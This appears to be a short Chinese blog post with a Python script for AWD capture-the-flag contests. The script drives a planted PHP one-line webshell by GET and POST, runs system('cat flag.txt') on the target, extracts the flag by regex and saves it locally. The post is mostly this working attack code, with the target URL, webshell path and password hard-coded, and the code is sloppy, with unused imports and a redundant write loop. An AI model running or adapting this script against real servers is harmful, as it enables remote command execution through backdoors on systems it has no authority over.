注意事项:

1,此脚本支持post-get两种一句话木马传参。

2,使用后会在目录生成txt文件,查看txt文件即可获取flag。

3,次脚本只限在AWD攻防中使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pdb import post_mortem
from turtle import pos
from urllib import request
import requests
import re

flag = "cat flag.txt" # 需要执行的命令
flag1 = "cat flag1.txt"
flag_1 = "http://192.168.20.140/" # 目标url
flag_2 = "index.php?" # 木马地址
flag_3 = "a" # 连接密码
flag_4 = "=system(%27"+flag+"%27);" # Get需要执行的命令
flag_5 = "system('"+flag1+"');" # Post需要执行的命令
list = [] # 获取flag的传递值

def get():
    response = requests.get(flag_1 + flag_2)
    response = response.status_code # 返回url响应值
    twohundred = 200
    if response == twohundred: # 判断response的响应值是否未200

        flag_6 = requests.get(flag_1 + flag_2 + flag_3 + flag_4)
        #print(re.search("flag{.*}", flag_6.text)) # 获取flag长度
        list.append(re.search("flag{.*}", flag_6.text).group(0)[:13])
        
    else:
        print(2)

def post():
    data = {flag_3:flag_5}
    response = requests.post(flag_1+flag_2)
    response = response.status_code # 返回url响应值
    twohundred = 200
    if response == twohundred: # 判断response的响应值是否未200
        flag_6 = requests.post(flag_1+flag_2,data=data)
        #print(re.search("flag{.*}", flag_6.text)) # 获取flag长度
        list.append(re.search("flag{.*}", flag_6.text).group(0)[:13])
    else:
        print(2)
get()
post()

if list[0] == list[1]:
    #print(list[0]) 
    Note=open('flag.txt',mode='w')
    Note.write(list[0]+" \n")
else:
    for i in range(0,2):
        #print(list[i])
        Note=open('flag.txt',mode='w')
        Note.write(list[0]+" \n")
        Note.write(list[i]+" \n")



Share Comments